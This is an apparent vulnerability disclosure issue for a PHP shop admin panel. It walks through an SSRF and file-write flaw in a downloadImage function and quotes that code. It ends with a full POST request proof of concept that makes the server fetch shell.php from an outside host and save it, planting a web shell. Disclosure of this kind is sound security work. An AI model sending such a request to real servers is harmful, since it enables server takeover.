An SSRF vulnerability leads to system access

ViktorWkxStar commented 4 years ago

By looking at the source code, we found a SSRF vulnerability that could read arbitrary files on a remote or local server and save them to a web server. Therefore, malicious users can download the malicious Trojan files to the web server to obtain the permissions of the web server。

analysis： public function downloadImage($url = '', $name = '', $type = 0, $timeout = 30, $w = 0, $h = 0) { if (!strlen(trim($url))) return ''; if (!strlen(trim($name))) { //TODO 获取要下载的文件名称 $downloadImageInfo = $this->getImageExtname($url); if (!$this->checkExtname($url, $downloadImageInfo['ext_name'])) { return JsonService::fail('文件后缀不合法'); } $name = $downloadImageInfo['file_name']; if (!strlen(trim($name))) return ''; }

The above code is to get the name of the file to download

//TODO 获取远程文件所采用的方法 if ($type) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, false); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); //TODO 跳过证书检查 if (stripos($url, "https://") !== FALSE) curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2); //TODO 从证书中检查SSL加密算法是否存在 curl_setopt($ch, CURLOPT_HTTPHEADER, array('user-agent:' . $_SERVER['HTTP_USER_AGENT'])); if (ini_get('open_basedir') == '' && ini_get('safe_mode' == 'Off')) curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);//TODO 是否采集301、302之后的页面 $content = curl_exec($ch); curl_close($ch); } else { try { ob_start(); readfile($url); $content = ob_get_contents(); ob_end_clean(); } catch (\Exception $e) { return $e->getMessage(); } } Since the default value of the $type parameter is 0, it will skip the if judgment directly and jump to the else judgment. The readfile method reads the value of the $url parameter and writes it to the output buffer. $content gets the content of the output buffer through the ob_get_contents() method.

$size = strlen(trim($content)); if (!$content || $size <= 2) return '图片流获取失败'; $date_dir = date('Y') . DS . date('m') . DS . date('d'); $upload_type = sys_config('upload_type', 1); $upload = new Upload((int)$upload_type, [ 'accessKey' => sys_config('accessKey'), 'secretKey' => sys_config('secretKey'), 'uploadUrl' => sys_config('uploadUrl'), 'storageName' => sys_config('storage_name'), 'storageRegion' => sys_config('storage_region'), ]); $info = $upload->to('attach/' . $date_dir)->validate()->stream($content, $name); if ($info === false) { return $upload->getError(); } $imageInfo = $upload->getUploadInfo(); $date['path'] = str_replace('\\', '/', $imageInfo['dir']); $date['name'] = $imageInfo['name']; $date['size'] = $imageInfo['size']; $date['mime'] = $imageInfo['type']; $date['image_type'] = $upload_type; $date['is_exists'] = false; return $date; } The rest of the code is to write the contents of the read file to the web server.

Recurrence of loopholes： 1、http://localhost/admin/store._copy_taobao/downloadImage poc: `POST http://localhost/admin/store._copy_taobao/downloadImage HTTP/1.1 Host: localhost Content-Length: 77 Accept: application/json, text/javascript, /; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Content-Type: application/x-www-form-urlencoded Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/admin/store.copy_taobao/index.html Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: clear_0.0.1=1; PHPSESSID=fa722bf27161fcf456f38e1f47750105; mapKey=%22%22; login_back_url=%22/cart%22 Connection: close

url=http://x.x.x.x/shell.php&name=shell.php`